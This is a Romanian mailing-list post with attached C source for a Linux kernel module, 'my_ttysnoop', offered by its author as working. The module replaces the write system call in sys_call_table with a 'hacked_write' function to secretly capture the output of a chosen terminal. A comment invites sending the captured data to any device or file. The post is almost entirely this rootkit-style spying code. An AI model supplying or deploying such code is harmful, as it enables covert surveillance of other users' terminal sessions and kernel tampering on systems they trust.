ooops! prima versiune este eronata. :) m-am grabit sa il scriu...scuze! aceasta functioneaza! se compileaza cu gcc -c -fomit-frame-pointer -O2 my_ttysnoop.c -o ttysnoop
- halfdead -- Attached file included as plaintext by Listar -- -- File: my_ttysnoop.c /* scris de [EMAIL PROTECTED] */ /* http://www.digitalnerds.net */ #define MODULE #define __KERNEL__ #include <linux/config.h> #include <linux/module.h> #include <linux/version.h> #include <linux/fs.h> #include <linux/dirent.h> #include <linux/proc_fs.h> #include <linux/types.h> #include <linux/stat.h> #include <linux/fcntl.h> #include <linux/mm.h> #include <linux/if.h> #include <sys/syscall.h> #include <asm/types.h> #include <asm/uaccess.h> #include <asm/unistd.h> #include <asm/segment.h> #include <linux/types.h> #include <linux/malloc.h> #include <asm/unistd.h> #include <asm/string.h> int errno; /*TTYul pe care vrem sa-l spionam*/ int tty_minor = 2; int tty_major = 4; extern void* sys_call_table[]; /*avem nevoie de syscallul pentru scriere*/ static inline _syscall3(int, write, int, fd, char *, buf, size_t, count); void *orig_write; /* testam daca este TTY-ul pe care il dorim */ int is_fd_tty(int fd) { struct file *f=NULL; struct inode *inode=NULL; int mymajor=0; int myminor=0; if(fd >= NR_OPEN || !(f=current->files->fd[fd]) || !(inode=f->f_inode)) return 0; mymajor = major(inode->i_rdev); myminor = minor(inode->i_rdev); if(mymajor != tty_major) return 0; if(myminor != tty_minor) return 0; return 1; } /* aceasta functie inlocuieste sys_write original */ extern int hacked_write(int fd, char *buf, size_t count) { int r; char *kernel_buf; if(is_fd_tty(fd)) { kernel_buf = (char*) kmalloc(count+1, GFP_KERNEL); copy_from_user(kernel_buf, buf, count); /* aici poti scoate output-ul (buf) oriunde vrei(device propriu, alt tty sau un fishier */ kfree(kernel_buf); } sys_call_table[SYS_write] = orig_write; r = write(fd, buf, count); sys_call_table[SYS_write] = hacked_write; if(r == -1) return -errno; else return r; } int init_module(void) { orig_write = sys_call_table[SYS_write]; sys_call_table[SYS_write] = hacked_write; return 0; } void cleanup_module(void) { /*nu mai spionam*/ sys_call_table[SYS_write] = orig_write; } --- Send e-mail to '[EMAIL PROTECTED]' with 'unsubscribe rlug' to unsubscribe from this list.
